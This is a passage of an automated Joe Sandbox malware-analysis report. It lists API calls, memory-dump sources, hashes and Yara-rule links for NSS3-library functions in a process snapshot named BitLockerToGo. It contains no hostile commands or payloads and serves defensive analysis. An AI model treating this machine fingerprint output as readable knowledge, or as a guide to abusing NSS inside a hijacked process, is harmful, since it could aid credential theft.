                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: EnterCriticalSection.KERNEL32 ref: 6C7090E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C709116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: LeaveCriticalSection.KERNEL32 ref: 6C70913F
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D3CE2
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6D3CF8
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D3D15
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D3D2E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4030862364-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ab982091cbe028e7badf93ff09a8a1825e1e856173b6be30a0d15ae7a4837093
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 691104B9A106006FE7205E65FC41B9BB2F4EB5530CF514534E41A8BB20E632F819CB5A
                                                                                                                                                                                                                                                                                                                                                          Function 6C6589E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6588AE,-00000008), ref: 6C658A04
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C658A15
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(6C6588AE,00000000,00000132), ref: 6C658A27
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C658A35
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(6C6588AE,00000000,00000132,00000000,-00000008,00000000,?,?,6C6588AE,-00000008), ref: 6C658A45
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(6C6588A6,?,6C6588AE,-00000008), ref: 6C658A4E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 65992600-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5566830a02e9b2a90ecf729288f2f0db1d5e7157d9392e6ff27d426331a709d6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75363eae6fe7d6e77e8f5b99a1f342b43f5ffad018498846b08c882d2527befe
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5566830a02e9b2a90ecf729288f2f0db1d5e7157d9392e6ff27d426331a709d6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA112BB5E403049FEF009F68DC48A9ABB78FF09358F600576E90497A10EB31D565C7E5
                                                                                                                                                                                                                                                                                                                                                          Function 6C69FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C69FE08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C69FE1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A116E
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C69FE29
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C69FE3D
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C69FE62
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?), ref: 6C69FE6F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 660648399-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7baba4a61de13080b1367e216d0039483a6c0929ca2ad2c0b258ec1fa8e3156d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 53944ad987868d6fb3b1704a3a39015b8966aeacfb6eecb127cc08bbf7a46da0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7baba4a61de13080b1367e216d0039483a6c0929ca2ad2c0b258ec1fa8e3156d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D01108B6600206BBEB008F55DC40A5B7398AF55399F158034F91D87B12E731E926C7AA
                                                                                                                                                                                                                                                                                                                                                          Function 6C758910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C75892E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
                                                                                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C758950
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C631A48), ref: 6C709BB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C631A48), ref: 6C709BC8
                                                                                                                                                                                                                                                                                                                                                          • getprotobynumber.WSOCK32(?), ref: 6C758959
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 6C758967
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?), ref: 6C75896F
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?), ref: 6C75898A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4143355744-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b9bcdf265a080732e62c3e10f68ffb97ebd4981be0b46fc7b70cec2fa5275fd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 477e78d8a90334e2425f974a8ac5eb0cf8946d5aec4eb71ed72c540bfdca0459
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b9bcdf265a080732e62c3e10f68ffb97ebd4981be0b46fc7b70cec2fa5275fd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C011E9F2E241209BDB005FB99A0858E7BA8AF46378F454376DC0997BA1DB308C14C7D6
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D6840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(00000000,?,6C6DAA9B,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D6846
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: calloc.MOZGLUE(00000001,0000019C,?,6C6315C2,?,?,?,?,?,00000001,00000040), ref: 6C63178D
                                                                                                                                                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(00000000,?,6C6DAA9B,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D6855
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C6455D0,00000000,00000000), ref: 6C69868B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: PR_NewLock.NSS3(00000000,00000000), ref: 6C6986A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C6986B2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C6986C8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C6986E2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C6986EC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C698700
                                                                                                                                                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(?,6C6DAA9B,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D687D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6318DE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6318F1
                                                                                                                                                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(?,6C6DAA9B,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D688C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6318FC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C63198A
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C6D68A5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C6D68B4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C709946
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5C16B7,00000000), ref: 6C70994E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: free.MOZGLUE(00000000), ref: 6C70995E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 200661885-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8d9acf8b3483402258e6f6509d174283e45ce5ca55b8bbeabd1e0b4cb18b3bb6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601FBB0A01B1746E7516B7648143E776F49F02389F16193AC46ACAB80EF61E4488BB9
                                                                                                                                                                                                                                                                                                                                                          Function 6C62AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C62AFDA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C62AFD3
                                                                                                                                                                                                                                                                                                                                                          • unable to delete/modify collation sequence due to active statements, xrefs: 6C62AF5C
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C62AFC4
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C62AFCE
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-924978290
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7e60409c953a4bdac64f52c13749042664b6762a21cafe9ec962861bf9a871be
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ab8471851440bec40dee323e73547e3a228e988feedac7d5c7e3a5c22bd0c1b9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e60409c953a4bdac64f52c13749042664b6762a21cafe9ec962861bf9a871be
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F91F471B002158FDB14CF59C850AEAB7F1BF85314F1985A8E865AB792C778ED02CF64
                                                                                                                                                                                                                                                                                                                                                          Function 6C68FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C68FC55
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C68FCB2
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C68FDB7
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C68FDDE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: pkcs11:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 362709927-2446828420
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4cc785a0920d2fa9dd2c6946cb36042aae468d95ac4ee0f06df2d6655ab96464
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2780801b6853c25defed6af608a34777daf72945b687625ef28ecb5e1ca0bafe
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cc785a0920d2fa9dd2c6946cb36042aae468d95ac4ee0f06df2d6655ab96464
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F65105B1A461129FEB009F65DD40BAA37B4EF45358F140025DE199BB51EB30E904CBBF
                                                                                                                                                                                                                                                                                                                                                          Function 6C6549C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C654860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C654894
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C656361,?,?,?), ref: 6C654A8F
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C656361,?,?,?), ref: 6C654AD0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
